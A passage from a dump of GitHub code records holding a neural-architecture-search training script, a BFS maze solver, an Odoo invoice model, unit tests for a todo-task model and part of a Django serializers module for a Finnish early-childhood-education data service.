args.pop_size].top1.avg, \n                population.get_population()[step % args.pop_size].top5.avg))\n            #break\n\ndef validation(model, valid_queue, criterion, gen):\n    model.eval()\n    for i in range(len(population.get_population())):\n        valid_start = time.time()\n        #discrete_alphas = utils.discretize(population.get_population()[i].arch_parameters, device)\n        #model.copy_arch_parameters(discrete_alphas)\n        #assert utils.check_equality(model, discrete_alphas)\n        \n        #Copying and checking the 
discretized alphas\n model.update_alphas(population.get_population()[i].arch_parameters[0])\n discrete_alphas = model.discretize()\n _, df_max, _ = model.show_alphas_dataframe()\n assert np.all(np.equal(df_max.to_numpy(), discrete_alphas.cpu().numpy()))\n assert model.check_alphas(discrete_alphas)\n \n population.get_population()[i].objs.reset()\n population.get_population()[i].top1.reset()\n population.get_population()[i].top5.reset()\n with torch.no_grad():\n for step, (inputs, targets) in enumerate(valid_queue):\n n = inputs.size(0)\n inputs = inputs.to(device)\n targets = targets.to(device)\n _, logits = model(inputs)\n loss = criterion(logits, targets)\n \n prec1, prec5 = utils.accuracy(logits, targets, topk = (1, 5))\n population.get_population()[i].objs.update(loss.data.cpu().item(), n)\n population.get_population()[i].top1.update(prec1.data.cpu().item(), n)\n population.get_population()[i].top5.update(prec5.data.cpu().item(), n)\n \n #print(step)\n #if (step + 1) % 10 == 0:\n #break\n #print(\"Finished in {} seconds\".format((time.time() - valid_start) ))\n\n logging.info(\"[{} Generation] {}/{} finished with validation loss: {}, prec1: {}, prec5: {}\".format(gen, i+1, len(population.get_population()), \n population.get_population()[i].objs.avg, \n population.get_population()[i].top1.avg, \n population.get_population()[i].top5.avg))\n #break\n\nDIR = \"search-{}-{}\".format(time.strftime(\"%Y%m%d-%H%M%S\"), args.dataset)\nif args.dir is not None:\n if not os.path.exists(args.dir):\n utils.create_exp_dir(args.dir)\n DIR = os.path.join(args.dir, DIR)\nelse:\n DIR = os.path.join(os.getcwd(), DIR)\nutils.create_exp_dir(DIR)\nutils.create_exp_dir(os.path.join(DIR, \"weights\"))\nlog_format = '%(asctime)s %(message)s'\nlogging.basicConfig(stream=sys.stdout, level=logging.INFO, format=log_format, datefmt='%m/%d %I:%M:%S %p')\nfh = logging.FileHandler(os.path.join(DIR, 'log.txt'))\nfh.setFormatter(logging.Formatter(log_format))\nlogging.getLogger().addHandler(fh)\n\n# Initializing the summary writer\nwriter = SummaryWriter(os.path.join(DIR, 'runs'))\n\ntorch.manual_seed(args.seed)\ntorch.cuda.manual_seed(args.seed)\ntorch.cuda.manual_seed_all(args.seed)\nnp.random.seed(args.seed)\nrandom.seed(args.seed)\n\ndevice = torch.device(\"cuda:{}\".format(args.gpu))\ncpu_device = torch.device(\"cpu\")\n\ntorch.cuda.set_device(args.gpu)\ncudnn.deterministic = True\ncudnn.enabled = True\ncudnn.benchmark = False\n\nassert args.api_path is not None, 'NAS201 data path has not been provided'\napi = API(args.api_path, verbose = False)\nlogging.info(f'length of api: {len(api)}')\n\n# Configuring dataset and dataloader\nif args.dataset == 'cifar10':\n acc_type = 'ori-test'\n val_acc_type = 'x-valid'\nelse:\n acc_type = 'x-test'\n val_acc_type = 'x-valid'\n\ndatasets = ['cifar10', 'cifar100', 'ImageNet16-120']\nassert args.dataset in datasets, 'Incorrect dataset'\nif args.cutout:\n train_data, valid_data, xshape, num_classes = get_datasets(name = args.dataset, root = args.data, cutout=args.cutout)\nelse:\n train_data, valid_data, xshape, num_classes = get_datasets(name = args.dataset, root = args.data, cutout=-1)\nlogging.info(\"train data len: {}, valid data len: {}, xshape: {}, #classes: {}\".format(len(train_data), len(valid_data), xshape, num_classes))\n\nconfig = load_config(path=args.config_path, extra={'class_num': num_classes, 'xshape': xshape}, logger=None)\nlogging.info(f'config: {config}')\n_, train_loader, valid_loader = get_nas_search_loaders(train_data=train_data, valid_data=valid_data, 
dataset=args.dataset,\n        config_root='configs', batch_size=(args.batch_size, args.valid_batch_size),\n        workers=args.workers)\ntrain_queue, valid_queue = train_loader, valid_loader\nlogging.info('search_loader: {}, valid_loader: {}'.format(len(train_queue), len(valid_queue)))\n\n# Model Initialization\n#model_config = {'C': 16, 'N': 5, 'num_classes': num_classes, 'max_nodes': 4, 'search_space': NAS_BENCH_201, 'affine': False}\nmodel = TinyNetwork(C = args.init_channels, N = args.num_cells, max_nodes = args.max_nodes,\n                    num_classes = num_classes, search_space = NAS_BENCH_201, affine = False,\n                    track_running_stats = args.track_running_stats)\nmodel = model.to(device)\n#logging.info(model)\n\noptimizer, _, criterion = get_optim_scheduler(parameters=model.get_weights(), config=config)\ncriterion = criterion.cuda()\nlogging.info(f'optimizer: {optimizer}\\nCriterion: {criterion}')\n\n# logging the initialized architecture\nbest_arch_per_epoch = []\n\narch_str = model.genotype().tostr()\narch_index = api.query_index_by_arch(model.genotype())\nif args.dataset == 'cifar10':\n    test_acc = get_arch_score(api, arch_index, 'cifar10', 200, acc_type)\n    valid_acc = get_arch_score(api, arch_index, 'cifar10-valid', 200, val_acc_type)\n    writer.add_scalar(\"test_acc\", test_acc, 0)\n    writer.add_scalar(\"valid_acc\", valid_acc, 0)\nelse:\n    test_acc = get_arch_score(api, arch_index, args.dataset, 200, acc_type)\n    valid_acc = get_arch_score(api, arch_index, args.dataset, 200, val_acc_type)\n    writer.add_scalar(\"test_acc\", test_acc, 0)\n    writer.add_scalar(\"valid_acc\", valid_acc, 0)\ntmp = (arch_str, test_acc, valid_acc)\nbest_arch_per_epoch.append(tmp)\n\n'''\noptimizer = torch.optim.SGD(model.parameters(), args.learning_rate, momentum = args.momentum, weight_decay = args.weight_decay)\ncriterion = nn.CrossEntropyLoss()\ncriterion.to(device)\ntrain_queue = torch.utils.data.DataLoader(train_data, batch_size=args.batch_size, pin_memory = False, num_workers = 2,\n                                          sampler = torch.utils.data.sampler.SubsetRandomSampler(indices[:split]))\nvalid_queue = torch.utils.data.DataLoader(\n    train_data, batch_size = 1024, #args.batch_size,\n    sampler = torch.utils.data.sampler.SubsetRandomSampler(indices[split:num_train]),\n    pin_memory = False, num_workers = 2)\n'''\nscheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, float(args.epochs), eta_min = args.learning_rate_min)\nlogging.info(f'Scheduler: {scheduler}')\n\n## Creating Population\npopulation = Population(pop_size = args.pop_size, num_edges = model.get_alphas()[0].shape[0], device = device)\n\nlogging.info(f'torch version: {torch.__version__}')\nlogging.info(\"gpu device = {}\".format(args.gpu))\nlogging.info(\"args = %s\", args)\nlogging.info(\"[INFO] Using ga with discretization\")\n\nga = GeneticAlgorithm(args.num_elites, args.tsize, device, args.mutate_rate)\n\n#scheduler.step()\nlr = scheduler.get_lr()[0]\n\n# STAGE 1\nstart = time.time()\nfor epoch in range(args.epochs):\n    ## Training the whole population\n    logging.info(\"[INFO] Generation {} training with learning rate {}\".format(epoch + 1, scheduler.get_lr()[0]))\n    start_time = time.time()\n\n    train(model, train_queue, criterion, optimizer, epoch + 1)\n    logging.info(\"[INFO] Training finished in {} minutes\".format((time.time() - start_time) / 60))\n    torch.save(model.state_dict(), \"model.pt\")\n    #lr = scheduler.get_lr()[0]\n    scheduler.step()\n\n    logging.info(\"[INFO] Evaluating Generation {} \".format(epoch + 1))\n    validation(model, valid_queue, criterion, 
epoch + 1)\n\n # Sorting the population according to the fitness in decreasing order\n population.pop_sort()\n \n for i, p in enumerate(population.get_population()):\n writer.add_scalar(\"pop_top1_{}\".format(i + 1), p.get_fitness(), epoch + 1)\n writer.add_scalar(\"pop_top5_{}\".format(i + 1), p.top5.avg, epoch + 1)\n writer.add_scalar(\"pop_obj_valid_{}\".format(i + 1), p.objs.avg, epoch + 1)\n\n # Saving the population after each generation\n tmp = []\n for individual in population.get_population():\n tmp.append(tuple((individual.arch_parameters[0].cpu().numpy(), individual.get_fitness())))\n with open(os.path.join(DIR, \"population_{}.pickle\".format(epoch + 1)), 'wb') as f:\n pickle.dump(tmp, f)\n\n # Copying the best individual to the model\n model.update_alphas(population.get_population()[0].arch_parameters[0])\n assert model.check_alphas(population.get_population()[0].arch_parameters[0])\n arch_str = model.genotype().tostr()\n arch_index = api.query_index_by_arch(model.genotype())\n if args.dataset == 'cifar10':\n test_acc = get_arch_score(api, arch_index, 'cifar10', 200, acc_type)\n valid_acc = get_arch_score(api, arch_index, 'cifar10-valid', 200, val_acc_type)\n writer.add_scalar(\"test_acc\", test_acc, epoch + 1)\n writer.add_scalar(\"valid_acc\", valid_acc, epoch + 1)\n else:\n test_acc = get_arch_score(api, arch_index, args.dataset, 200, acc_type)\n valid_acc = get_arch_score(api, arch_index, args.dataset, 200, val_acc_type)\n writer.add_scalar(\"test_acc\", test_acc, epoch + 1)\n writer.add_scalar(\"valid_acc\", valid_acc, epoch + 1)\n tmp = (arch_str, test_acc, valid_acc)\n best_arch_per_epoch.append(tmp)\n \n # Applying Genetic Algorithm\n pop = ga.evolve(population)\n population = pop \n \n last = time.time() - start_time\n logging.info(\"[INFO] {}/{} epoch finished in {} minutes\".format(epoch + 1, args.epochs, last / 60))\n utils.save(model, os.path.join(DIR, \"weights\",\"weights.pt\"))\n \n #if epoch > 0:\n # break\n\nwriter.close()\n\nlast = time.time() - start\nlogging.info(\"[INFO] {} hours\".format(last / 3600))\n\nlogging.info(f'[INFO] Best Architecture after the search: {best_arch_per_epoch[-1]}')\nlogging.info(f'length best_arch_per_epoch: {len(best_arch_per_epoch)}')\nwith open(os.path.join(DIR, \"best_architectures.pickle\"), 'wb') as f:\n pickle.dump(best_arch_per_epoch, f)\n\n","repo_name":"nightstorm0909/EvNAS","sub_path":"train_searchNAS201.py","file_name":"train_searchNAS201.py","file_ext":"py","file_size_in_byte":16280,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"33425965501","text":"\n\n\nfrom sys import stdin\n\ndef bfs(i, j):\n Q = [[i, j]]\n front = 0\n rear = 1\n while front != rear:\n ni, nj = Q[front]\n front += 1\n for x, y in [[1, 0], [-1, 0], [0, 1], [0, -1]]:\n nni, nnj = ni + x, nj + y\n if 0 <= nni < N and 0 <= nnj < M and arr[nni][nnj] == '1' and visited[nni][nnj] > visited[ni][nj] + int(arr[ni][nj]):\n visited[nni][nnj] = visited[ni][nj] + int(arr[ni][nj])\n rear += 1\n Q.append([nni, nnj])\n\nN, M = map(int, stdin.readline().split())\narr = [list(stdin.readline().strip()) for _ in range(N)]\nvisited = [[999]*M for _ in range(N)]\nvisited[0][0] = 1\nbfs(0, 0)\nprint(visited[N-1][M-1])","repo_name":"bigleaderman/algorithm_study","sub_path":"ssafy/22_04/0407/baekjoon/baekjoon_2178_미로탐색.py","file_name":"baekjoon_2178_미로탐색.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} 
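The baekjoon_2178 record above runs breadth-first search over a '0'/'1' maze with a hand-rolled list queue and a fixed sentinel of 999 for unvisited cells, which is only safe while every shortest path stays under 999 cells. Below is a minimal sketch, not part of the dataset, of the same traversal using collections.deque with 0 as the unvisited marker so no sentinel can be exceeded; the maze literal in the usage stub is a hypothetical sample in the same format ('1' = walkable, and the result counts the cells on the path, start and goal included).

from collections import deque

def shortest_path(grid, n, m):
    # dist[i][j] = number of cells on the shortest path from (0, 0); 0 means unvisited
    dist = [[0] * m for _ in range(n)]
    dist[0][0] = 1
    queue = deque([(0, 0)])
    while queue:
        i, j = queue.popleft()
        for di, dj in ((1, 0), (-1, 0), (0, 1), (0, -1)):
            ni, nj = i + di, j + dj
            # step onto walkable, not-yet-reached neighbours only
            if 0 <= ni < n and 0 <= nj < m and grid[ni][nj] == '1' and dist[ni][nj] == 0:
                dist[ni][nj] = dist[i][j] + 1
                queue.append((ni, nj))
    return dist[n - 1][m - 1]

if __name__ == '__main__':
    maze = ['101111', '101010', '101011', '111011']  # hypothetical 4x6 sample maze
    print(shortest_path(maze, 4, 6))  # prints 15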
+{"seq_id":"19642305878","text":"from odoo import api, fields, models\n\n\nclass AccountInvoice(models.Model):\n _inherit = \"account.invoice\"\n\n partner_no = fields.Char(\n string=\"Partner Number\",\n readonly=True,\n store=True,\n compute=\"_compute_partner_no\",\n )\n\n # We apply padding for better sorting and searchability.\n # i.e. there can be '999' and '1111' for partner_no of res.partner\n # records and sorting does not yield the expected result without padding.\n @api.depends(\"commercial_partner_id\", \"commercial_partner_id.partner_no\")\n def _compute_partner_no(self):\n for rec in self:\n partner = rec.commercial_partner_id\n if partner and partner.partner_no:\n rec.partner_no = partner.partner_no.zfill(6)\n","repo_name":"qrtl/nrq-custom","sub_path":"account_invoice_partner_number/models/account_invoice.py","file_name":"account_invoice.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"21389880522","text":"import os\nimport unittest\n\nfrom apps.todotasks.model import TodoModel\nfrom settings.database.utils import create_tables_database, dict_factory\nfrom settings.tests.database import TestDatabaseConnection\n\n\nclass TestTodoModel(unittest.TestCase):\n def setUp(self) -> None:\n return super().setUp()\n\n def tearDown(self) -> None:\n with self.model.database() as connection:\n cursor = connection.cursor()\n cursor.execute(\"DELETE FROM tasks\")\n return super().tearDown()\n\n @classmethod\n def setUpClass(cls) -> None:\n cls.model = TodoModel()\n cls.model.database = TestDatabaseConnection\n create_tables_database(cls.model.database.database_path)\n\n email = \"test@fake.com\"\n with cls.model.database(TestDatabaseConnection) as connection:\n cursor = connection.cursor()\n cursor.execute(\"INSERT INTO users(email, password) VALUES(?, ?)\", (email, \"12345678\"))\n cls.user = cursor.execute(\"SELECT user_id, email, password, created_at FROM users WHERE email = ?\", (email,)).fetchone()\n\n return super().setUpClass()\n\n @classmethod\n def tearDownClass(cls) -> None:\n if os.path.exists(cls.model.database.database_path):\n os.remove(cls.model.database.database_path)\n return super().tearDownClass()\n\n def test_create_task(self):\n new_task = \"New task\"\n result = self.model.create_task(self.user[\"user_id\"], new_task)\n\n self.assertTrue(result)\n\n def test_create_task_created(self):\n new_task = \"New task\"\n self.model.create_task(self.user[\"user_id\"], new_task)\n\n with self.model.database(TestDatabaseConnection) as connection:\n cursor = connection.cursor()\n task = cursor.execute(\"SELECT task_name FROM tasks WHERE user_id = ?\", (self.user[\"user_id\"],)).fetchone()\n \n task = dict(task)\n self.assertEqual(task[\"task_name\"], new_task)\n\n def test_update_task(self):\n new_task = \"New task\"\n self.model.create_task(self.user[\"user_id\"], new_task)\n\n with self.model.database(TestDatabaseConnection) as connection:\n cursor = connection.cursor()\n task = cursor.execute(\"SELECT task_id, task_name FROM tasks WHERE user_id = ?\", (self.user[\"user_id\"],)).fetchone()\n \n task = dict(task)\n result = self.model.update(self.user[\"user_id\"], task[\"task_id\"], \"Task updated\")\n\n self.assertTrue(result)\n\n def test_update_task_wrong_task_id(self):\n result = self.model.update(self.user[\"user_id\"], 10000, \"Task updated\")\n\n self.assertFalse(result)\n\n def test_get_all_tasks(self):\n self.model.create_task(self.user[\"user_id\"], \"New task\")\n 
result = self.model.get_all_tasks(self.user[\"user_id\"])\n\n self.assertIsInstance(result, list)\n\n def test_get_all_tasks_no_tasks(self):\n result = self.model.get_all_tasks(self.user[\"user_id\"])\n\n self.assertEqual(None, result)\n\n def test_delete_task(self):\n self.model.create_task(self.user[\"user_id\"], \"New task\")\n with self.model.database(TestDatabaseConnection) as connection:\n cursor = connection.cursor()\n task = cursor.execute(\"SELECT task_id, task_name FROM tasks WHERE user_id = ?\", (self.user[\"user_id\"],)).fetchone()\n \n task = dict(task)\n\n result = self.model.delete(self.user[\"user_id\"], task[\"task_id\"])\n\n self.assertTrue(result)\n\n def test_delete_task_no_task(self):\n result = self.model.delete(self.user[\"user_id\"], 10000)\n\n self.assertFalse(result)\n\n def test_get_task_id(self):\n self.model.create_task(self.user[\"user_id\"], \"New task\")\n\n with self.model.database(TestDatabaseConnection) as connection:\n cursor = connection.cursor()\n task = cursor.execute(\"SELECT task_id, task_name FROM tasks WHERE user_id = ?\", (self.user[\"user_id\"],)).fetchone()\n task = dict(task)\n \n result = self.model.get_task_id(self.user[\"user_id\"], 1)\n self.assertEqual(task[\"task_id\"], result)\n","repo_name":"amssdias/py-task","sub_path":"apps/todotasks/tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":4113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8348553395","text":"import datetime\n\nfrom django.apps import apps\nfrom django.conf import settings\nfrom django.contrib.postgres.aggregates import StringAgg\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import connection\nfrom django.db.models import OuterRef, Q, Subquery, Sum\nfrom drf_yasg import openapi\nfrom drf_yasg.utils import swagger_serializer_method\nfrom rest_framework import serializers\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.fields import DecimalField\nfrom rest_framework.reverse import reverse\n\nfrom varda import validators\nfrom varda.clients.allas_s3_client import Client as S3Client\nfrom varda.constants import SUCCESSFUL_STATUS_CODE_LIST\nfrom varda.custom_swagger import CustomSchemaField\nfrom varda.enums.change_type import ChangeType\nfrom varda.enums.error_messages import ErrorMessages\nfrom varda.enums.organisaatiotyyppi import Organisaatiotyyppi\nfrom varda.excel_export import ExcelReportSubtype, ReportStatus, ExcelReportType, get_s3_object_name\nfrom varda.misc import CustomServerErrorException, decrypt_excel_report_password, decrypt_henkilotunnus\nfrom varda.misc_queries import get_active_filter, get_history_value_subquery, get_related_object_changed_id_qs\nfrom varda.models import (Henkilo, Huoltajuussuhde, KieliPainotus, Lapsi, Maksutieto, MaksutietoHuoltajuussuhde,\n Palvelussuhde, PidempiPoissaolo, Taydennyskoulutus, TaydennyskoulutusTyontekija, Tutkinto,\n Tyoskentelypaikka, TilapainenHenkilosto, ToiminnallinenPainotus, Toimipaikka, Tyontekija,\n Organisaatio, Varhaiskasvatuspaatos, Varhaiskasvatussuhde, Z10_KelaVarhaiskasvatussuhde,\n Z4_CasKayttoOikeudet, Z6_RequestCount, Z6_RequestLog, Z6_RequestSummary, Z8_ExcelReport,\n Z9_RelatedObjectChanged)\nfrom varda.serializers import ToimipaikkaHLField, OrganisaatioPermissionCheckedHLField\nfrom varda.serializers_common import OidRelatedField\n\n\nclass KelaBaseSerializer(serializers.Serializer):\n kotikunta_koodi = 
serializers.CharField(source='henkilo_instance.kotikunta_koodi')\n henkilotunnus = serializers.SerializerMethodField()\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n if 'view' in self.context:\n # view is not present in context in Swagger\n self.datetime_lte = self.context['view'].datetime_lte\n\n def to_representation(self, instance):\n # Get henkilo data from history table or actual table (history is incomplete in test environments)\n henkilo = (Henkilo.history.filter(id=instance.henkilo_id, history_date__lte=self.datetime_lte).distinct('id')\n .order_by('id', '-history_date').first())\n if not henkilo:\n henkilo = Henkilo.objects.filter(id=instance.henkilo_id).first()\n instance.henkilo_instance = henkilo\n\n return super().to_representation(instance)\n\n def get_henkilotunnus(self, instance):\n henkilotunnus = getattr(instance.henkilo_instance, 'henkilotunnus', None)\n henkilo_id = getattr(instance.henkilo_instance, 'id', None)\n return decrypt_henkilotunnus(henkilotunnus, henkilo_id=henkilo_id, raise_error=False)\n\n\nclass KelaEtuusmaksatusAloittaneetSerializer(KelaBaseSerializer, serializers.ModelSerializer):\n tietue = serializers.CharField(default='A', initial='A')\n vakasuhde_alkamis_pvm = serializers.DateField(source='suhde_alkamis_pvm')\n\n class Meta:\n model = Z10_KelaVarhaiskasvatussuhde\n fields = ('kotikunta_koodi', 'henkilotunnus', 'tietue', 'vakasuhde_alkamis_pvm')\n\n\nclass KelaEtuusmaksatusMaaraaikaisetSerializer(KelaBaseSerializer, serializers.ModelSerializer):\n tietue = serializers.CharField(default='M', initial='M')\n vakasuhde_alkamis_pvm = serializers.DateField(source='suhde_alkamis_pvm')\n vakasuhde_paattymis_pvm = serializers.DateField(source='suhde_paattymis_pvm')\n\n class Meta:\n model = Z10_KelaVarhaiskasvatussuhde\n fields = ('kotikunta_koodi', 'henkilotunnus', 'tietue', 'vakasuhde_alkamis_pvm', 'vakasuhde_paattymis_pvm')\n\n\nclass KelaEtuusmaksatusLopettaneetSerializer(serializers.Serializer):\n kotikunta_koodi = serializers.CharField()\n henkilotunnus = serializers.SerializerMethodField()\n tietue = serializers.CharField(default='L', initial='L')\n vakasuhde_paattymis_pvm = serializers.DateField(source='paattymis_pvm')\n\n def get_henkilotunnus(self, instance):\n return decrypt_henkilotunnus(instance.henkilotunnus)\n\n class Meta:\n model = Varhaiskasvatussuhde\n fields = ['henkilotunnus', 'kotikunta_koodi', 'tietue', 'vakasuhde_paattymis_pvm']\n\n\nclass KelaEtuusmaksatusKorjaustiedotSerializer(KelaBaseSerializer, serializers.ModelSerializer):\n tietue = serializers.CharField(default='K', initial='K')\n vakasuhde_alkamis_pvm = serializers.SerializerMethodField()\n vakasuhde_paattymis_pvm = serializers.SerializerMethodField()\n vakasuhde_alkuperainen_alkamis_pvm = serializers.SerializerMethodField()\n vakasuhde_alkuperainen_paattymis_pvm = serializers.SerializerMethodField()\n\n class Meta:\n model = Z10_KelaVarhaiskasvatussuhde\n fields = ('kotikunta_koodi', 'henkilotunnus', 'tietue', 'vakasuhde_alkamis_pvm', 'vakasuhde_paattymis_pvm',\n 'vakasuhde_alkuperainen_alkamis_pvm', 'vakasuhde_alkuperainen_paattymis_pvm')\n\n def get_vakasuhde_alkamis_pvm(self, instance):\n is_different = instance.suhde_alkamis_pvm != instance.old_suhde_alkamis_pvm\n return instance.suhde_alkamis_pvm if is_different else datetime.date(1, 1, 1)\n\n def get_vakasuhde_paattymis_pvm(self, instance):\n # If paattymis_pvm has been set, it is reported in Lopettaneet, do not report change here\n is_different = (instance.suhde_paattymis_pvm != 
instance.old_suhde_paattymis_pvm and\n instance.old_suhde_paattymis_pvm is not None)\n return instance.suhde_paattymis_pvm or datetime.date(1, 1, 1) if is_different else datetime.date(1, 1, 1)\n\n def get_vakasuhde_alkuperainen_alkamis_pvm(self, instance):\n is_different = instance.suhde_alkamis_pvm != instance.old_suhde_alkamis_pvm\n return instance.old_suhde_alkamis_pvm if is_different else datetime.date(1, 1, 1)\n\n def get_vakasuhde_alkuperainen_paattymis_pvm(self, instance):\n is_different = instance.suhde_paattymis_pvm != instance.old_suhde_paattymis_pvm\n return instance.old_suhde_paattymis_pvm or datetime.date(1, 1, 1) if is_different else datetime.date(1, 1, 1)\n\n\nclass KelaEtuusmaksatusKorjaustiedotPoistetutSerializer(KelaBaseSerializer, serializers.ModelSerializer):\n tietue = serializers.CharField(default='K', initial='K')\n vakasuhde_alkamis_pvm = serializers.DateField(default='0001-01-01')\n vakasuhde_paattymis_pvm = serializers.DateField(default='0001-01-01')\n vakasuhde_alkuperainen_alkamis_pvm = serializers.DateField(source='suhde_alkamis_pvm')\n vakasuhde_alkuperainen_paattymis_pvm = serializers.SerializerMethodField()\n\n class Meta:\n model = Z10_KelaVarhaiskasvatussuhde\n fields = ('kotikunta_koodi', 'henkilotunnus', 'tietue', 'vakasuhde_alkamis_pvm', 'vakasuhde_paattymis_pvm',\n 'vakasuhde_alkuperainen_alkamis_pvm', 'vakasuhde_alkuperainen_paattymis_pvm')\n\n def get_vakasuhde_alkuperainen_paattymis_pvm(self, instance):\n return instance.suhde_paattymis_pvm or datetime.date(1, 1, 1)\n\n\nclass TiedonsiirtotilastoSerializer(serializers.Serializer):\n vakatoimijat = serializers.IntegerField()\n toimipaikat = serializers.IntegerField()\n vakasuhteet = serializers.IntegerField()\n vakapaatokset = serializers.IntegerField()\n lapset = serializers.IntegerField()\n maksutiedot = serializers.IntegerField()\n kielipainotukset = serializers.IntegerField()\n toiminnalliset_painotukset = serializers.IntegerField()\n paos_oikeudet = serializers.ReadOnlyField()\n\n\nclass AbstractErrorReportErrorsSerializer(serializers.Serializer):\n error_code = serializers.CharField()\n description = serializers.CharField()\n model_name = serializers.CharField()\n model_id_list = serializers.ListField(child=serializers.IntegerField())\n\n\nclass AbstractErrorReportSerializer(serializers.ModelSerializer):\n errors = serializers.SerializerMethodField()\n\n @swagger_serializer_method(serializer_or_field=AbstractErrorReportErrorsSerializer)\n def get_errors(self, instance):\n # This function parses the list of errors from different error attributes in the object.\n error_list = []\n for view_error_list in self.context['view'].get_errors():\n error_dict = view_error_list[0].value\n error_attr = (getattr(instance, error_dict['error_code'].lower(), '') or\n getattr(instance, error_dict['error_code'], ''))\n if error_attr is not None and error_attr != '':\n model_id_list = error_attr.split(',')\n error_list.append({\n **error_dict,\n 'model_name': view_error_list[4],\n 'model_id_list': [int(model_id) for model_id in set(model_id_list)]\n })\n return error_list\n\n\nclass AbstractHenkiloErrorReportSerializer(AbstractErrorReportSerializer):\n henkilo_id = serializers.IntegerField(source='henkilo.id')\n henkilo_oid = serializers.ReadOnlyField(source='henkilo.henkilo_oid')\n etunimet = serializers.ReadOnlyField(source='henkilo.etunimet')\n sukunimi = serializers.ReadOnlyField(source='henkilo.sukunimi')\n\n\nclass ErrorReportLapsetSerializer(AbstractHenkiloErrorReportSerializer):\n lapsi_id = 
serializers.IntegerField(source='id')\n oma_organisaatio_id = serializers.IntegerField(source='oma_organisaatio.id', allow_null=True)\n oma_organisaatio_oid = serializers.ReadOnlyField(source='oma_organisaatio.organisaatio_oid', allow_null=True)\n oma_organisaatio_nimi = serializers.ReadOnlyField(source='oma_organisaatio.nimi', allow_null=True)\n paos_organisaatio_id = serializers.IntegerField(source='paos_organisaatio.id', allow_null=True)\n paos_organisaatio_oid = serializers.ReadOnlyField(source='paos_organisaatio.organisaatio_oid', allow_null=True)\n paos_organisaatio_nimi = serializers.ReadOnlyField(source='paos_organisaatio.nimi', allow_null=True)\n\n class Meta:\n model = Lapsi\n fields = ('lapsi_id', 'henkilo_id', 'henkilo_oid', 'etunimet', 'sukunimi',\n 'oma_organisaatio_id', 'oma_organisaatio_oid', 'oma_organisaatio_nimi',\n 'paos_organisaatio_id', 'paos_organisaatio_oid', 'paos_organisaatio_nimi',\n 'errors')\n\n\nclass ErrorReportTyontekijatSerializer(AbstractHenkiloErrorReportSerializer):\n tyontekija_id = serializers.IntegerField(source='id')\n\n class Meta:\n model = Tyontekija\n fields = ('tyontekija_id', 'henkilo_id', 'henkilo_oid', 'etunimet', 'sukunimi', 'errors')\n\n\nclass ErrorReportToimipaikatSerializer(AbstractErrorReportSerializer):\n toimipaikka_id = serializers.IntegerField(source='id')\n\n class Meta:\n model = Toimipaikka\n fields = ('toimipaikka_id', 'nimi', 'organisaatio_oid', 'vakajarjestaja_id', 'errors')\n\n\nclass TiedonsiirtoListSerializer(serializers.ListSerializer):\n def to_representation(self, data):\n reverse_param = self.context['request'].query_params.get('reverse', 'False')\n if reverse_param in ('true', 'True',):\n # If reverse is activated, i.e. user has clicked to the last page (sorting by timestamp ascending),\n # reverse the list so that results in a page are ordered by timestamp descending\n data.reverse()\n return super(TiedonsiirtoListSerializer, self).to_representation(data)\n\n\nclass TiedonsiirtoSerializer(serializers.ModelSerializer):\n target = serializers.SerializerMethodField(read_only=True)\n user_id = serializers.IntegerField(read_only=True, source='user.id')\n username = serializers.CharField(read_only=True, source='user.username')\n vakajarjestaja_id = serializers.IntegerField(read_only=True, source='vakajarjestaja.id')\n vakajarjestaja_name = serializers.CharField(read_only=True, source='vakajarjestaja.nimi')\n\n class Meta:\n model = Z6_RequestLog\n fields = ('request_url', 'request_method', 'request_body', 'response_code', 'response_body',\n 'lahdejarjestelma', 'target', 'user_id', 'username', 'vakajarjestaja_id', 'vakajarjestaja_name',\n 'timestamp')\n list_serializer_class = TiedonsiirtoListSerializer\n\n def get_target(self, instance):\n target_model = instance.target_model\n target_id = instance.target_id\n target = {}\n if target_model in ['Lapsi', 'Tyontekija']:\n if target_model == 'Lapsi':\n id_name = 'lapsi_id'\n else:\n id_name = 'tyontekija_id'\n\n try:\n target_object = apps.get_model('varda', target_model).objects.get(id=target_id)\n except (LookupError, ObjectDoesNotExist):\n # Could not find target object\n return None\n\n target[id_name] = instance.target_id\n target['henkilo_oid'] = target_object.henkilo.henkilo_oid\n target['etunimet'] = target_object.henkilo.etunimet\n target['sukunimi'] = target_object.henkilo.sukunimi\n return target\n\n\nclass TiedonsiirtoYhteenvetoSerializer(serializers.Serializer):\n date = serializers.DateField(read_only=True)\n successful = serializers.IntegerField(read_only=True)\n 
unsuccessful = serializers.IntegerField(read_only=True)\n user_id = serializers.IntegerField(read_only=True, source='user__id')\n username = serializers.CharField(read_only=True, source='user__username')\n\n class Meta:\n list_serializer_class = TiedonsiirtoListSerializer\n\n\nclass ExcelReportSerializer(serializers.ModelSerializer):\n organisaatio = OrganisaatioPermissionCheckedHLField(view_name='organisaatio-detail', required=False,\n permission_groups=[Z4_CasKayttoOikeudet.RAPORTTIEN_KATSELIJA])\n organisaatio_oid = OidRelatedField(object_type=Organisaatio,\n parent_field='organisaatio',\n parent_attribute='organisaatio_oid',\n prevalidator=validators.validate_organisaatio_oid,\n either_required=False)\n toimipaikka = ToimipaikkaHLField(view_name='toimipaikka-detail', required=False)\n toimipaikka_oid = OidRelatedField(object_type=Toimipaikka,\n parent_field='toimipaikka',\n parent_attribute='organisaatio_oid',\n prevalidator=validators.validate_organisaatio_oid,\n either_required=False)\n toimipaikka_nimi = serializers.CharField(read_only=True, source='toimipaikka.nimi', allow_null=True)\n url = serializers.SerializerMethodField()\n password = serializers.SerializerMethodField()\n\n class Meta:\n model = Z8_ExcelReport\n exclude = ('s3_object_path',)\n read_only_fields = ('id', 'filename', 'status', 'password', 'user', 'timestamp', 's3_object_path')\n\n def validate_report_type(self, value):\n if value not in [report_type.value for report_type in ExcelReportType]:\n raise ValidationError([ErrorMessages.ER002.value])\n return value\n\n def validate_report_subtype(self, 